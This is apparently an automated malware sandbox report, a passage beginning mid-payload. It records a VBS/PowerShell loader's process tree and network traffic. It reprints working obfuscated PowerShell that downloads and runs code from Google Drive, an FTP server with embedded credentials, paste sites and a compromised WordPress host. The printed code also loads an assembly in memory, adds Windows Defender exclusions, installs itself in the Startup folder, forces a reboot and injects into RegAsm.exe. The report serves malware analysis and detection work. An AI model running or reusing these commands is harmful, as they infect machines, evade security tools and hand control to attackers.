+ 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBu' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'GU' + [char]65 + 'R' + [char]65 + '' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Jw' + [char]65 + 'l' + [char]65 + 'Ek' + [char]65 + 'a' + [char]65 + 'Bx' + [char]65 + 'FI' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'l' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'BJ' + [char]65 + 'C0' + [char]65 + 'eQBw' + [char]65 + 'G8' + [char]65 + 'Qw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'HM' + [char]65 + 'ZQBy' + [char]65 + 'G8' + [char]65 + 'bg' + [char]65 + 'v' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Gk' + [char]65 + 'dQBx' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'GE' + [char]65 + 'cwB1' + [char]65 + 'Hc' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'Gw' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'Gg' + [char]65 + 'cwBy' + [char]65 + 'GU' + [char]65 + 'dwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'I' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'JwB1' + [char]65 + 'HM' + [char]65 + 'bQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'aQB3' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'VQBc' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'V' + [char]65 + 'By' + [char]65 + 'Eg' + [char]65 + 'VgB1' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'Ow' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQBt' + [char]65 + 'GE' + [char]65 + 'TgBy' + [char]65 + 'GU' + [char]65 + 'cwBV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'G0' + [char]65 + 'bgBv' + [char]65 + 'HI' + [char]65 + 'aQB2' + [char]65 + 'G4' + [char]65 + 'RQBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'HI' + [char]65 + 'ZQBz' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + '6' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'HU' + [char]65 + 'cwBt' + [char]65 + 'C4' + [char]65 + 'bgBp' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + 'BV' + [char]65 + 'Fw' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cs' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'QgBL' + [char]65 + 'Ew' + [char]65 + 'UgBV' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gw' + [char]65 + 'aQBG' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bl' + [char]65 + 'GY' + [char]65 + 'eQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'Ow' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'JwB0' + [char]65 + 'E8' + [char]65 + 'T' + [char]65 + 'Bj' + [char]65 + 'F8' + [char]65 + 'SwBh' + [char]65 + 'DM' + [char]65 + 'WgBm' + [char]65 + 'G8' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'y' + [char]65 + 'Eo' + [char]65 + 'SgBy' + [char]65 + 'FY' + [char]65 + 'a' + [char]65 + 'Bt' + [char]65 + 'FY' + [char]65 + 'OQBj' + [char]65 + 'G0' + [char]65 + 'OQBY' + [char]65 + 'HM' + [char]65 + 'dQBY' + [char]65 + 'G0' + [char]65 + 'ag' + [char]65 + 'x' + [char]65 + 'Gc' + [char]65 + 'MQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Cg' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DI' + [char]65 + 'N' + [char]65 + 'B1' + [char]65 + 'Fg' + [char]65 + 'SgBU' + [char]65 + 'HE' + [char]65 + 'YQBt' + [char]65 + 'Gc' + [char]65 + 'eQBN' + [char]65 + 'HQ' + [char]65 + 'RgB6' + [char]65 + 'GE' + [char]65 + 'awBQ' + [char]65 + 'FI' + [char]65 + 'MQBx' + [char]65 + 'F8' + [char]65 + 'SQB2' + [char]65 + 'Ec' + [char]65 + 'aQBY' + [char]65 + 'E4' + [char]65 + 'Z' + [char]65 + 'Bx' + [char]65 + 'GE' + [char]65 + 'Tg' + [char]65 + 'x' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BJ' + [char]65 + 'G8' + [char]65 + 'cQBh' + [char]65 + 'EY' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'HI' + [char]65 + 'bQBF' + [char]65 + 'Hc' + [char]65 + 'ag' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DQ' + [char]65 + 'Ng' + [char]65 + 'n' + [char]65 + 'Cg' + [char]65 + 'cwBu' + [char]65 + 'Gk' + [char]65 + 'YQB0' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'RQBS' + [char]65 + 'FU' + [char]65 + 'V' + [char]65 + 'BD' + [char]65 + 'EU' + [char]65 + 'V' + [char]65 + 'BJ' + [char]65 + 'Eg' + [char]65 + 'QwBS' + [char]65 + 'EE' + [char]65 + 'XwBS' + [char]65 + 'E8' + [char]65 + 'UwBT' + [char]65 + 'EU' + [char]65 + 'QwBP' + [char]65 + 'FI' + [char]65 + 'U' + [char]65 + '' + [char]65 + '6' + [char]65 + 'HY' + [char]65 + 'bgBl' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'cgBt' + [char]65 + 'EU' + [char]65 + 'dwBq' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'n' + [char]65 + 'D0' + [char]65 + 'Z' + [char]65 + 'Bp' + [char]65 + 'CY' + [char]65 + 'Z' + [char]65 + 'Bh' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bu' + [char]65 + 'Hc' + [char]65 + 'bwBk' + [char]65 + 'D0' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'G8' + [char]65 + 'c' + [char]65 + 'B4' + [char]65 + 'GU' + [char]65 + 'PwBj' + [char]65 + 'HU' + [char]65 + 'LwBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'GU' + [char]65 + 'b' + [char]65 + 'Bn' + [char]65 + 'G8' + [char]65 + 'bwBn' + [char]65 + 'C4' + [char]65 + 'ZQB2' + [char]65 + 'Gk' + [char]65 + 'cgBk' + [char]65 + 'C8' + [char]65 + 'Lw' + [char]65 + '6' + [char]65 + 'HM' + [char]65 + 'c' + [char]65 + 'B0' + [char]65 + 'HQ' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'dQBz' + [char]65 + 'G0' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'dwBw' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'FQ' + [char]65 + 'cgBI' + [char]65 + 'FY' + [char]65 + 'dQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'ZQBk' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'V' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBo' + [char]65 + 'HQ' + [char]65 + 'YQBQ' + [char]65 + 'C4' + [char]65 + 'TwBJ' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'y' + [char]65 + 'Cg' + [char]65 + 'cwBs' + [char]65 + 'GE' + [char]65 + 'dQBx' + [char]65 + 'EU' + [char]65 + 'LgBy' + [char]65 + 'G8' + [char]65 + 'agBh' + [char]65 + 'E0' + [char]65 + 'LgBu' + [char]65 + 'G8' + [char]65 + 'aQBz' + [char]65 + 'HI' + [char]65 + 'ZQBW' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Ow' + [char]65 + '=';$nvcbv = $qKKzc.replace('уЦϚ' , 'A') ;$acwwn = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs');powershell $acwwn
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3308
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2592
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1868
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c mkdir "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
          4⤵
            PID:1832
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1020
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\rnmzv.ps1"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2880
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:4040
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs"
            4⤵
              PID:3196

      Network

      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        ftp.desckvbrat.com.br
        powershell.exe
        Remote address:
        8.8.8.8:53
        Request
        ftp.desckvbrat.com.br
        IN A
        Response
        ftp.desckvbrat.com.br
        IN CNAME
        desckvbrat.com.br
        desckvbrat.com.br
        IN A
        191.252.83.213
      • flag-us
        DNS
        64.159.190.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        64.159.190.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        213.83.252.191.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        213.83.252.191.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        paste.ee
        powershell.exe
        Remote address:
        8.8.8.8:53
        Request
        paste.ee
        IN A
        Response
        paste.ee
        IN A
        104.21.84.67
        paste.ee
        IN A
        172.67.187.200
      • flag-us
        GET
        https://paste.ee/d/A73sV/0
        powershell.exe
        Remote address:
        104.21.84.67:443
        Request
        GET /d/A73sV/0 HTTP/1.1
        Host: paste.ee
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 04 Oct 2024 01:39:56 GMT
        Content-Type: text/plain; charset=utf-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Cache-Control: max-age=2592000
        strict-transport-security: max-age=63072000
        x-frame-options: DENY
        x-content-type-options: nosniff
        x-xss-protection: 1; mode=block
        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vtDFcIvIGhtXQPOb5rH0Pzn3tBkMapmkH5hOmWQ%2F%2BrnRIsfpDhA0Xmv7taS%2BhgL7c56xBoeNDg53TJil1a9PJQCzOp%2Bau8tQGXyZNf%2BXNvDIbhqiX0TumTXqGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8cd176041cabcd21-LHR
        alt-svc: h3=":443"; ma=86400
      • flag-us
        GET
        https://paste.ee/d/g6QGg/0
        powershell.exe
        Remote address:
        104.21.84.67:443
        Request
        GET /d/g6QGg/0 HTTP/1.1
        Host: paste.ee
        Response
        HTTP/1.1 200 OK
        Date: Fri, 04 Oct 2024 01:39:59 GMT
        Content-Type: text/plain; charset=utf-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Cache-Control: max-age=2592000
        strict-transport-security: max-age=63072000
        x-frame-options: DENY
        x-content-type-options: nosniff
        x-xss-protection: 1; mode=block
        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
        cf-cache-status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2B2Fd%2BEgDmZHTgof64AHBF1UKCN48m1v74f38jFjQ%2BWZucZ%2BGzY1cqeHstmlCXe7qICwrHRW9Tvz%2F4uo%2BYfI5XqS%2B3IffMGkhp%2F4fpw19va8BFURdJn%2Bd23JZg%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8cd176154b77cd21-LHR
        alt-svc: h3=":443"; ma=86400
      • flag-us
        GET
        https://paste.ee/d/WdRMT/0
        powershell.exe
        Remote address:
        104.21.84.67:443
        Request
        GET /d/WdRMT/0 HTTP/1.1
        Host: paste.ee
        Response
        HTTP/1.1 200 OK
        Date: Fri, 04 Oct 2024 01:40:01 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 541
        Connection: keep-alive
        Cache-Control: max-age=2592000
        strict-transport-security: max-age=63072000
        x-frame-options: DENY
        x-content-type-options: nosniff
        x-xss-protection: 1; mode=block
        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJbkMBeVuKU8vclv9Jlm%2Bw1ATKhJ8fJoP3SlvUS%2FE6KCdWRat%2FRV08iXPq03nhUen54RN%2FAioEMnkV2L03XBqukn5VlPMfZrIFaALi4BemRsMWWjqow8pxxNBA%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8cd17623dac5cd21-LHR
        alt-svc: h3=":443"; ma=86400
      • flag-us
        DNS
        67.84.21.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        67.84.21.104.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        www.gratitudeseekers.com
        powershell.exe
        Remote address:
        8.8.8.8:53
        Request
        www.gratitudeseekers.com
        IN A
        Response
        www.gratitudeseekers.com
        IN CNAME
        gratitudeseekers.com
        gratitudeseekers.com
        IN A
        173.231.247.100
      • flag-us
        GET
        https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txt
        powershell.exe
        Remote address:
        173.231.247.100:443
        Request
        GET /wp-includes/customize/css/bd.txt HTTP/1.1
        Host: www.gratitudeseekers.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 04 Oct 2024 01:39:59 GMT
        Server: Apache
        Last-Modified: Tue, 01 Oct 2024 10:57:16 GMT
        Accept-Ranges: bytes
        Content-Length: 658776
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/plain
      • flag-us
        DNS
        100.247.231.173.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        100.247.231.173.in-addr.arpa
        IN PTR
        Response
        100.247.231.173.in-addr.arpa
        IN PTR
        vps75292inmotionhostingcom
      • flag-us
        DNS
        pastebin.com
        powershell.exe
        Remote address:
        8.8.8.8:53
        Request
        pastebin.com
        IN A
        Response
        pastebin.com
        IN A
        172.67.19.24
        pastebin.com
        IN A
        104.20.4.235
        pastebin.com
        IN A
        104.20.3.235
      • flag-us
        GET
        https://pastebin.com/raw/pQQ0n3eA
        powershell.exe
        Remote address:
        172.67.19.24:443
        Request
        GET /raw/pQQ0n3eA HTTP/1.1
        Host: pastebin.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 04 Oct 2024 01:40:02 GMT
        Content-Type: text/plain; charset=utf-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        x-frame-options: DENY
        x-content-type-options: nosniff
        x-xss-protection: 1;mode=block
        cache-control: public, max-age=1801
        CF-Cache-Status: HIT
        Age: 664
        Last-Modified: Fri, 04 Oct 2024 01:28:58 GMT
        Server: cloudflare
        CF-RAY: 8cd1762adf109483-LHR
      • flag-us
        DNS
        24.19.67.172.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        24.19.67.172.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        149.220.183.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        149.220.183.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        53.210.109.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        53.210.109.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        206.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        206.23.85.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
